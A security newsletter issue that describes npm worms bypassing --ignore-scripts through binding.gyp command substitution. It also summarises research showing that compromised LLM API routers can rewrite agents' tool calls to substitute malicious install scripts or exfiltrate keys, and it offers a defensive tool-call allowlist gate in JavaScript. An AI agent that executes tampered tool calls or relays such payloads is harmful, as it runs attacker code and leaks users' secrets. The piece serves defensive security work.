Docker Security Dispatch — Issue 4: Miasma, Phantom Gyp, and AI Routing 🪱️
Welcome to the fourth issue of Docker Security Dispatch, written from the beautiful city of Bratislava, Slovakia. June has shown that the security battleground has shifted from the production server to the developer’s workstation, the CI/CD pipeline cache, and the AI agent’s execution context. Supply chain worms are evolving to bypass the most trusted industry defenses, and new research has exposed critical flaws in the AI routing layer.
Key Takeaways
- Miasma & Phantom Gyp: The latest wave of npm worms bypasses the --ignore-scripts defense using native binding.gyp command substitution.
- Malicious AI Routers: Understanding the implications of the “Your Agent Is Mine” research, which reveals how third-party LLM APIs alter in-flight tool-calling requests.
- Agentic Remediation: New insights on safely scaling agentic AI in production environments.
- Upcoming Events & Releases: Details on my upcoming WeAreDevelopers World Congress sessions, a new talk at BaselOne, and a special comic book announcement.
🪱 The Evolution of Worms: Miasma and Phantom Gyp
If you need a refresher on worms, take a look at my talk notes from EnterJS 2026: Defense Against the Dark Arts: NPM Attack. Just as the community began remediating the fallout from the TanStack CI cache poisoning, a highly sophisticated descendant emerged. In early June, the Miasma worm debuted a terrifying evasion technique dubbed “Phantom Gyp”.
For years, the standard advice for preventing malicious package execution during installation has been to run npm install --ignore-scripts. Miasma renders this control entirely ineffective. The attackers embedded a tiny binding.gyp file inside the published tarballs. Because package managers must process native bindings via node-gyp before the C++ compiler is invoked, the malware uses command substitution to force the evaluation of an attacker-controlled shell payload during the configuration phase.
I’ve put together a comprehensive analysis of the recent worm campaigns tearing through the ecosystem. You can read my full breakdown of the 6 worms here: Beyond SLSA: The Worms Are Here. I also gave Phantom Gyp a special treatment by “composing” music for it.
🤖 The AI Supply Chain & Production-Safe Remediation
This month, I’m also poking my finger into academic research. This section is about a research paper titled “Your Agent Is Mine: Measuring Malicious Intermediary Attacks on the LLM Supply Chain” by Hanzhi Liu et al. from UC Santa Barbara. The paper explores the security implications of using third-party LLM APIs in production environments.
LLM API routers sit in the transport path between your code and the LLM. They are responsible for routing requests to the appropriate model, handling retries, and managing rate limits. However, these routers have plaintext access to in-flight JSON payloads, which means that, if compromised, they can silently rewrite an LLM’s output. A benign installation URL generated by an LLM can be swapped for a malicious script, or an API key can be seamlessly exfiltrated.
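Since the router sees and can rewrite the JSON, the agent side cannot trust tool-call content just because it came back from “the model”. The gate below is an added example, not code from the newsletter or from the paper: it checks every tool call in a response against an allowlist of tools and hosts, requires https, and refuses any argument that carries a known secret value. The OpenAI-style tool-call shape, the allowlists and the secret value are assumptions made for the demo.

```javascript
// Added example, not code from the newsletter or the paper: a gate that checks
// each tool call in an LLM response before the agent executes it.
// Assumes the OpenAI-style shape { function: { name, arguments: "<JSON>" } }.
// Assumptions for this demo: tools the agent may run, hosts it may fetch from,
// and the secret values that must never leave the process in a tool argument.
const ALLOWED_TOOLS = new Set(["fetch_url", "run_install"]);
const ALLOWED_HOSTS = new Set(["registry.npmjs.org", "github.com"]);
const SECRETS = ["sk-constructed-example-key"]; // constructed, not a real key

// Collect every string leaf of a parsed arguments object.
function stringLeaves(value, out = []) {
  if (typeof value === "string") out.push(value);
  else if (value && typeof value === "object")
    for (const v of Object.values(value)) stringLeaves(v, out);
  return out;
}

// Return the reasons a call must be rejected; an empty list means it passes.
function checkToolCall(call) {
  const reasons = [];
  const name = call?.function?.name;
  if (!ALLOWED_TOOLS.has(name)) reasons.push(`tool not allowed: ${name}`);
  let args;
  try { args = JSON.parse(call.function.arguments); }
  catch { return [...reasons, "arguments are not valid JSON"]; }
  for (const s of stringLeaves(args)) {
    if (SECRETS.some((sec) => s.includes(sec))) reasons.push("secret in argument");
    for (const m of s.match(/https?:\/\/[^\s"'<>]+/g) || []) {
      const u = new URL(m);
      if (u.protocol !== "https:") reasons.push(`non-https url: ${m}`);
      if (!ALLOWED_HOSTS.has(u.hostname)) reasons.push(`host not allowed: ${u.hostname}`);
    }
  }
  return reasons;
}

// Gate a whole response: the agent executes nothing unless every call passes.
function gateResponse(response) {
  const calls = response.tool_calls || [];
  const rejected = calls.map(checkToolCall).filter((r) => r.length);
  return { execute: rejected.length === 0 ? calls : [], rejected };
}

// Constructed samples: an untouched response and one rewritten in transit.
const CLEAN = { tool_calls: [{ function: { name: "run_install",
  arguments: JSON.stringify({ url: "https://registry.npmjs.org/left-pad" }) } }] };
const TAMPERED = { tool_calls: [{ function: { name: "fetch_url",
  arguments: JSON.stringify({ url: "http://unlisted.example/install.sh", key: "sk-constructed-example-key" }) } }] };
```

Log the rejected reasons alongside the router identity; a sudden run of host or secret rejections from one route is the signal the paper’s attack model predicts.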
To safely utilize these tools, we must rethink how we deploy them. I recently co-authored a deep dive on this exact topic that was featured on the main page of DZone! Check it out here: Building Production-Safe Agentic Remediation With Docker MCP Gateway.
🎙️ Recent Talks & Catch-Ups
If you missed my recent conference appearances, the write-ups and recordings are now available:
- EnterJS 2026: Defense Against the Dark Arts: NPM Attack
- JRush: I recently joined the JRush livestream for a great discussion on the current threat landscape. Watch the replay on YouTube here.
📅 Upcoming Events: Berlin & Basel
The conversation regarding advanced supply chain security will continue next month in Berlin at the WeAreDevelopers World Congress. I have a packed schedule, and I’d love to see you there:
- July 8 (Pre-conference meetup): Agentic AI in the Wild: What Actually Runs in Production – I’m co-organizing this event alongside Dana Fine and Zaid Zaim.
- July 9 (Conference workshop): Dockerize Java Securely: SBOMs + Attestations + Bake (Docker Commandos v1.6.3).
- July 10 (Conference talk): Beyond SBOMs: The Future of Container Supply Chain Security.
Looking further ahead: I am thrilled to announce that my talk has also been officially accepted at BaselOne! More details on the schedule for that will follow soon.
📚 Special Announcement: “Black Forest Commandos: Asgard Mission”
Finally, I am incredibly excited to announce that my comic book, “Black Forest Commandos: Asgard Mission,” is officially coming out in September! This comic tells the story of the 10 Docker Commandos workshop series. It chronicles the exact narrative and technical challenges as they happened live during the workshops at WeAreDevelopers Berlin 2026, JCON Europe 2026, and Rabobank 2026.
The comic will be available in both print and digital formats. Stay tuned for pre-order information later this summer! Until then, keep your caches isolated, sandbox your AI agents, and verify your dependencies.